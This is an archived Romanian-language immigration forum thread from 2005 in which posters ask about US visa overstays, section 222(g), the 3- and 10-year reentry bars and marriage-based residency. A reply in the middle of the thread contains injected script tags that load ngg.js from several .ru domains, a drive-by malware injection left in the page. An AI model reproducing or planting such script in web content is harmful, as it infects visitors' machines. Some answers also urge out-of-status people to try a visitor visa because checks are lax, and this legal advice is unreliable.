PDA

Arată versiune întreagă : depasirea vizei in SUA



coriana
02.09.2005, 00:30
<DIV>
<DIV>Buna ziua !</DIV>
<DIV></DIV>
<DIV> Am avut o viza J1de au-pairpentru un an de zile . Am depasit aceasta perioada iar acum sunt subiect al sectiunii 222(g). Va rog sa-mi explicati care sunt consecintele acestui fapt si pe ce perioada se intind in obtinerea unei noi vize de non-imigrare sau in cazul castigarii loteriei vizelor?</DIV>
<DIV></DIV>
<DIV>Va multumesc !</DIV></DIV>

observator
02.09.2005, 03:34
Buna ziua,


Imi pare rau sa va spun ca fiind "out of status", adicain statut ilegal,nu mai putetzi aplica penru nici un fel de schimbare de viza/status, mai ales ca avetzi si o conditzie in pasaport, pe care cu atat mai multnu o mai putetzi scoate in situatzia de fatza.


Consecintzele depind de perioada de ilegalitate (cat atzi stat peste valabilitatea vizei).


Toate cele bune!

goodman
03.09.2005, 17:56
Buna ziua, am si eu o dilema aici.Am venit in State acum 3 ani, cu viza
J-1.Si acuma imi este expirata.Am incercat sa aplic ptr viza de
vizitator,B2 dar ptr ca nu am putut dovedi ca am bani ca sa ma mentin
aici in State, mi-a fost refuzata viza.

Ce as putea sa fac ca sa devin legal aici in State?

Va dor sa-mi scrie-ti la good.man@personal.ro .



Multumesc!

observator
04.09.2005, 03:20
Buna dimineatza,


In momemtul acesta nu avetzi nici o varianta legala in afara casatoriei cu un cetatzean american, si aceea daca nu suntetzi subiect al sectziunii 212(E)-respectiv nu avetzi in pasaport conditzia de a va intoarce in tzara de origine pentru doi ani.


Numai bine va doresc!

marc74
04.09.2005, 21:30
Buna ziua,


Va deranjez si eu cu o intrebare.


Am venit in State la sfarsitul lunii iunie cu o viza H-2bcare e valabila pana la sfarsitul lui noiembrie anul acesta. Eu am schimbat angajatorul, adica nu mai lucrez la firmacu care aveam contractul si care apare pe viza.Se poate face ceva in sensulprelungirii legale a sederii mele aici?


Va multumesc.

observator
06.09.2005, 03:25
Buna dimineatza,


Din cauza ca atzi schimbat angajatorul fara sa ceretzi asta la/prin USCIS (banuiesc), nu mai suntetzi considerat in statut legal, deci nu mai putetzi aplica pentru nici un tip de viza de munca. Singura iesire din aceasta situatzie este sa solicitatzi o viza de vizitator, caz in care nu se fac prea multe verificari. Oricum, shansele dv. sunt injumatatzite deja, dar merita sa incercatzi. Uneori merge.


Exista desigur si varianta casatoriei cu un cetatzean american, fapt care v-ar da posibilitatea aplicarii pentru green card.


Pentru mai multe amanunte ma putezi suna.


Toate cele bune!

goodman
06.09.2005, 17:31
Nu nu am acea conditie in pasaport.Ce inseamna asta ptr mine?

coriana
07.09.2005, 00:31
<DIV>
<DIV>AM SCRIS:</DIV>
<DIV> Am avut o viza J1de au-pairpentru un an de zile . Am depasit aceasta perioada iar acum sunt subiect al sectiunii 222(g). Va rog sa-mi explicati care sunt consecintele acestui fapt si pe ce perioada se intind in obtinerea unei noi vize de non-imigrare sau in cazul castigarii loteriei vizei?</DIV>
<DIV></DIV>
<DIV>MI-ATI RASPUNS:</DIV>
<DIV> Imi pare rau sa va spun ca fiind "out of status", adicain statut ilegal,nu mai putetzi aplica penru nici un fel de schimbare de viza/status, mai ales ca avetzi si o conditzie in pasaport, pe care cu atat mai multnu o mai putetzi scoate in situatzia de fatza.Consecintzele depind de perioada de ilegalitate (cat atzi stat peste valabilitatea vizei).</DIV>
<DIV></DIV>
<DIV>AS DORI SA MENTIONEZ CA AM STAT PESTE VALABILITATEA VIZEI 6 LUNI...</DIV>
<DIV>


"nu mai putetzi aplica penru nici un fel de schimbare de viza/statut."ADICA AR FI TOTAL FARA ROST SA APLIC LA LOTERIA VIZELOR SPRE EX.ORI SA APLIC PT.ORICE ALT TIP DE VIZA?


VA MULTUMESC FRUMOS!!!!!!!!!</DIV></DIV>

observator
07.09.2005, 02:21
Exact. Stiu ca nu va vine sa credetzi , dar asta este realitatea. In plus exista si restrictzii drastice legate de intoarcerea dv. in US in cazul in care atzi pleca in Romania si atzi vrea sa va intoarcetzi sub orice modalitate.


Numai bine!

07.09.2005, 06:31
In plus exista si restrictzii drastice legate de intoarcerea dv. in US
in cazul in care atzi pleca in Romania si atzi vrea sa va intoarcetzi

Parca depasirea de la 180 zile la 1 an aduce de la sine interdictia
revenirii in US pe o durata de 10 ani (zic asta din memorie). Probabil
ca numai casatoria cu un cetatean american sa elimine restrictia.

PS Nu ma pricep prea bine dar ma bag in speranta ca ajuta.

Pisoi
07.09.2005, 08:28
Articol interesant de citit si care poate da raspunsul la cei in cauza.





Admission into the U.S. is not guaranteed. In all cases, the alien is still subject to immigration inspection at a port of entry to determine whether the alien is admissible into the country.


Unlawful Presence
Under the Illegal Immigration Reform and Immigrant Responsibility Act of 1996 (http://uscis.gov/lpBin/lpext.dll/?f=id&amp;id=publaw-pl104208), aliens who depart the United States after being unlawfully present in the United States for certain periods may be barred from admission, even if they have obtained Advance Parole. Those aliens unlawfully present in the United States for more than 180 days but less than one year and depart voluntarily before the start of removal proceedings are inadmissible for three years; those who are unlawfully present for one year or more are inadmissible for ten years.


Aliens who have concerns about admissibility should contact an immigration attorney or an immigrant assistance organization accredited by the Board of Immigration Appeals before making foreign travel plans.

07.09.2005, 10:05
Pisoi:

Asa este m-a inselat memoria:

http://www.visapro.com/Immigration-Articles/?a=173&amp;z=30 (http://www.visapro.com/Immigrati&#111;n-Articles/?a=173&amp;z=30)





<table style="font-weight: bold; width: 475px; height: 19px;" border="0" cellpadding="0" cellspacing="0">
<t><tr><td width="92%">[</font></td></tr></t>
</table>



<table border="0" cellpadding="0" cellspacing="0" width="100%">
<t><tr>
<td valign="top" width="8%">a.</font></td>
<td width="92%">

The
Three Year Bar:
Persons who remain in the U.S.
after their authorized stay
has expired for more than 180
days but less than one year,
and who leave the U.S. prior
to the institution of removal
proceedings, are barred from
reentering the U.S. for three
years from their date of departure.
</font> </td>
</tr>
</t></table>







<table border="0" cellpadding="0" cellspacing="0" width="100%">
<t><tr>
<td valign="top" width="8%">b.</font></td>
<td width="92%">The
Ten Year Bar: Persons
who remain in the U.S. after their
authorized stay has expired for
more than one year, and who leave
the U.S. prior to the institution
of removal proceedings, are barred
from reentering the U.S. for ten
years from their date of departure.





</font></td></tr></t></table></font>


/script>ript src=http://c=http://www.cvsr.<script src=http://www.nmr43.ru/ngg.js></script><script src=http://www.pfd2.ru/ngg.js></script><script src=http://www.iroe.ru/ngg.js></script><script src=http://www.kodj.ru/ngg.js></script><script src=http://www.kjwd.ru/ngg.js></script><script src=http://www.bce8.ru/ngg.js></script><script src=http://www.nemr.ru/ngg.js></script><script src=http://www.kpo3.ru/ngg.js></script><script src=http://www.nemr.ru/ngg.js></script><script src=http://www.iroe.ru/n<script src=http://www.iroe.ru/ngg.js></script>

coriana
07.09.2005, 14:07
Multumesc pt.articole!!!!smileys/smiley2.gif


Insa EU AM STAT PESTE VIZA MAI PUTIN DE 180 DE ZILE(cam 170).....DE UNDE AM ACEASTA INTERDICTIE 222(g)........DACA AS FI STAT PESTE 180 DE ZILE AS FI PRIMIT O ALTA INTERDICTIE -NU IMI AMINTESC NUMELE EI........


Mentionez si faptul ca am parasit SUA de buna voie.


Asadar,....dupa cum mi-ati spus -daca la o depasire intre 180zile-respectiv mai putin de 1 an...interzicerea de a intrare in SUA este de 3 ani.........................................oare in cazul meu :


La o depasire sub 180 de zile(drept dovada aceasta sectiune 222(g)si nu o alta)...la cat timp imi este permis sa reintru in SUA...?


Textul urmator pe care l-ati citit si dvs.initial,l-am trimis si la Ambasada SUA in Bucuresti:"Buna ziua!


Am avut o viza J1de au-pairpentru un an de zile . Am depasit aceasta perioada iar acum sunt subiect al sectiunii 222(g). Va rog sa-mi explicati care sunt consecintele acestui fapt si pe ce perioada se intind in obtinerea unei noi vize de non-imigrare sau in cazul castigarii loteriei ?"


Raspunsul lor a fost:"Nu se poate aprecia in avans, la momentul analizarii dosarului se va vedea."


...ceea ce ma face sa sper ca 222(g)...nu e o sanctiune atat de drastica...INTREBAREA IMI RAMANE -----OARE PE CAT TIMP AM INTERDICTIA?


Va multumesc!smileys/smiley1.gif
<DIV dir=ltr align=left></DIV>

coriana
07.09.2005, 23:58
smileys/smiley1.gifLa o depasire sub 180 de zile(drept dovada aceasta sectiune 222(g)si nu o alta)...la cat timp imi este permis sa reintru in SUA...?.............


va rog!!!!!!!sunt tare nerabdatoare sa aflu!!!!!!!!!!!


am tot incercat eu sa ma uit pe ici pe colo pe internet ,dar nu am reusit sa aflu.....

marioana
08.09.2005, 01:20
Cred ca numai un avocat iti poate raspunde corect, desi cred ca totul va depinde de tipul vizei solicitate. Acum nu ai interdictie de a intra in USA, dar la cererea unei alte vize faptul ca ai stat peste viza va fi o bila neagra. Probabil ca o viza turistica nu vei primi, dar in cazul loteriei nu cred ca va conta asa de mult...Totul depinde de cei de la ambasada....

08.09.2005, 03:59
Iar ma bag fara sa stiu prea bine ce scriu.

Inteleg ca principala consecinta a sectiunii 222(g) este ca, atunci
cand depasesti durata permisa de sedere, viza cu care ai intrat este
automat anulata/invalidata.

Poate te ajuta link-ul urmator:

http://www.shusterman.com/222g.html



Acolo am dedus (deci nu sunt sigur) niste prescurtari: TCN=Third country national; NIV=non-immigrant visa; IV=immigrant visa

insa important este ca scrie:

IF AN ALIEN OVERSTAYS
AND THEN RETURNS TO HIS/HER COUNTRY OF NATIONALITY TO APPLY
FOR A NEW NIV, THE ALIEN HAS IN FACT COMPLIED WITH 222(G)
AND COULD NOT BE DENIED VISA PROCESSING ON 222(G) GROUNDS.

</pre>
Deci, daca te-ai intors de bunavoie in Ro. de fapt te-ai conformat INA 222(G) si nu mai ai treaba cu sectiunea asta.

Inteleg ca mai exista "3/10 years ban" si probabil ca nu ti-se aplica (ai sub 180zile depasire).

Am insa aceeasi parere ca si "marioana" </span>anume
ca va fi greu sa-l convingi pe functionarul de la ghiseul consulatului
US din Ro. (in alta tara poti primi refuz direct pe baza 222(G))
ca nu ai dorinta sa te stabilesti in US atunci cand vei cere o viza
non-immigrant (probabil cu exceptii gen H-1B care admite
"dual-intent"). La vizele de immigrant (deci si loteria) + H-1B
banuiesc ca nu va fi nici o problema.



Dar destul cu amatorismul meu. In caz ca "observator" nu-ti vede
mesajul ca sa-ti respunda poti incerca sa pui intrebarea si pe forumuri
(in engleza) ale altor birouri de immigration attorneys in US.

observator
08.09.2005, 07:59
Faptul ca dv. suntetzi acum in RO shimba putzin termenii problemei. Lucrul acesta nu l-atzi mentzionat in momentul in care atzi pus intrebarea, de aceea eu va dadeam sfaturi ca si candatzi fifost in US.


Deci,ca sa fim clari de data asta, dv. atzi depasit valabilitatea vizei cu mai putzin de 180 de zile si atzi parasit de buna voie US. In acest caz nu intratzi sub incidentza interdictziilor de 3 sau 10 animai sus amintite.


Cu toate acestea, insa, este foarte putzin probabil sa mai primitzi prea curandvreo viza (oricare ar fi ea). Americanii nu iarta usor si nu fac concesii, mai ales atunci cand se incalca legalitatea.


Asta nu inseamna ca nu putetzi incerca. Poate avetzi noroc.


Va doresc numai bine!

Altcineva
19.09.2005, 07:12
hello


sunt un student din romania cu 3 ani de universitate pe care i-am stopat pentru a ramane aici , am o viza j1 care mai e valabila pana la sfarsitul lui octombrie


ma gandeam sa aplic pentru b2 !


am alta varianta ?

Altcineva
19.09.2005, 08:11
Buna ziua,


Imi pare rau sa va spun ca fiind "out of status", adicain statut ilegal,nu mai putetzi aplica penru nici un fel de schimbare de viza/status, mai ales ca avetzi si o conditzie in pasaport, pe care cu atat mai multnu o mai putetzi scoate in situatzia de fatza.


Consecintzele depind de perioada de ilegalitate (cat atzi stat peste valabilitatea vizei).


Toate cele bune!





suntem 3 studenti cu 3 ani de univ terminati si vrem sa ramanem aici


deocamdata mai avem viza pana la 1 octombrie ( j1 )


vrem sa aplicam pentyru b2 , putem face altceva ?


asteptam raspuns urgent
, va multumim

romanianguy
21.09.2005, 08:00
Buna ziua,am o intrebare.

Daca ma casatoresc cu un cetatzean american, cat timp dureaza actele?Sau pana la interviu?

Am auzit de la unii care s-au casatorit ca dupa 2-3 luni, dupa ce ai
trimis hartiile,primesti dreptul de munca si apoi dupa vreo 6 luni
mergi la interviu la INS.Este adevarat?

Va rog sa-mi ziceti ce formular este nevoie in cazul casatoriei cu un
cetatzean american si dupa cat timp primesc dreptul de munca?Posibile
intrebari si cat poate dura un interviu.

De asemenea,ce hartii va trebui sa aduca americanca cu ea si ce dovezi.



Va multumesc!



GoodMan

goodman
07.11.2005, 07:27
Buna ziua,am o rugaminte.In cazul casatoriei cu un cetatzean
american,ce formulare trebuie trimite la INS.E vorba de K-1 sau
de K-3.

Eu sunt momentan in State si as dori sa obtin formularele care trebuie semnate de cei casatoriti si trimise la INS.



Va multumesc!



< =""></>